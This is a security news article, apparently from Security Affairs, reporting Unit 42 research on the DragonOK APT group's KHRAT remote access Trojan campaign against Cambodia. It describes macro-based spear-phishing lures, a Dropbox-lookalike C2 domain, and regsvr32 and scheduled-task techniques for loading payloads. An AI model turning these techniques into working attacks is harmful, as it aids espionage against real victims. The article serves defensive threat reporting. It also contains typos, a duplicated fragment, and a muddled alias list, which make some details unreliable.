DragonOK APT is adopting new tactics, techniques and procedures

Researchers at Palo Alto Networks recently observed the DragonOK APT group adopting new tactics, techniques and procedures.

China-linked cyber espionage group DragonOK is back, security experts from Palo Alto Networks have uncovered a new campaign leveraging the KHRAT remote access Trojan (RAT).

The DragonOk group (also known as NetTraveler (TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT i) was first spotted September 2014 by security researchers at FireEye.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seem to work in parallel.

The first team of hackers named Moafee, targeted military and government organizations which were in some way involved in South China sea dispute. The attackers hit different organizations as explained by the researchers at FireEye and appear to operate from the Guangdong Province. The group hit entities working in the defense industry in the United States.

A second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

Early this year, DragonOK targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education, and semiconductor.

The recent campaign featuring the KHRAT RAT targets victims located in Cambodia.

“Unit 42 recently observed activity involving the Remote Access Trojan KHRAT used by threat actors to target the citizens of Cambodia.” reads the blog post published by PaloAlto networks.

“So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forecpoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.”

The KHRAT RAT provides attackers with the typical set of RAT features, including remote access to the victim system, keylogging, and remote shell access.

Researchers from PaloAlto Networks noticed the threat actor has updated the spear phishing techniques and themes used in its campaign.

The hackers are using multiple methods to download and execute additional payloads using built-in Windows applications, they also started mimicking Dropbox.

Below Key findings provided by PaloAlto networks:

• Updated spear phishing techniques and themes;
• Multiple techniques to download and execute additional payloads using built-in Windows applications;
• Expanded infrastructure mimicking the name of the well-known cloud-based file hosting service, Dropbox;
• Compromised Cambodian government servers.

The experts observed an increase in the usage of this specific RAT over the past couple of months, the attacks against Cambodian entities were discovered in June.

Researchers observed the DragonOK group using weaponized files referencing in the title the “MIWRMP” (Mekong Integrated Water Resources Management Project), a multi-million dollar project regarding water resources and fisheries management in North Eastern Cambodia.

“The weaponized document, with the filename “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June 26-30, 2017(update).doc”, was shown in AutoFocus as contacting a Russian IP address 194.87.94[.]61 over port 80 in the form of a HTTP GET request to update.upload-dropbox[.]com – a site that could (erroneously) be thought of as belonging to the well-known cloud-based file hosting service, Dropbox, and as such is intended to trick victims and network defenders into thinking, at least at first glance, the C2 traffic is legitimate.” states the analysis.

The document trick victims into enabling macros to run malicious operations, including creating new scheduled tasks and calling functions to run JavaScript code.

PaloAlto experts observed hackers using the domain name update.upload-dropbox[.]com that has been hosted on a compromised Cambodian government’s website.

The sample hosted on the compromised government servers would launch the legitimate regsvr32.exe program to bypass included Windows protections.

“Index.ico would create three scheduled tasks with the more subtly named “Windows Scheduled Maintenance1” (Maintenance2 and Maintenance3), although three services with incremented numbers in their names is also a little suspicious, and use regsvr32.exe to download and execute three other .ico files – reg.ico, reg_salt.ico and reg_bak.ico – the purposes of which are currently unknown.” continues the analysis. “It’s worth noting each service has different running frequencies – every 4 minutes, 20 minutes and 10 minutes, respectively, which could indicate a dependency on reg.ico, as it is more aggressively sought after, or that is a more critical component to have running.”

The researchers also noticed that threat actor used a JavaScript code that allows it to monitor who is visiting their site. The code would gather data such as user-agent, domain, cookie, referrer and Flash version, and appears almost identical to that found on a blog hosted on the Chinese Software Developer Network (CSDN) website.

The malware researchers conclude that the DragonOK APT has updated both the malware and their tactics, techniques and procedures (TTPs) in the last months probably, because it was planning to intensify its activity.months probably, because it was planning to intensify its activity.

“The threat actors behind KHRAT have evolved the malware and their TTPs over the course of this year, in an attempt to produce more successful attacks, which in this case included targets within Cambodia.” concluded PaloAlto.

“This most recent campaign highlights social engineering techniques being used with reference and great detail given to nationwide activities, likely to be forefront of peoples’ minds; as well as the new use of multiple techniques in Windows to download and execute malicious payloads using built-in applications to remain inconspicuous which is a change since earlier variants,” 

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – DragonOK APR, hacking)

[adrotate banner=”12″]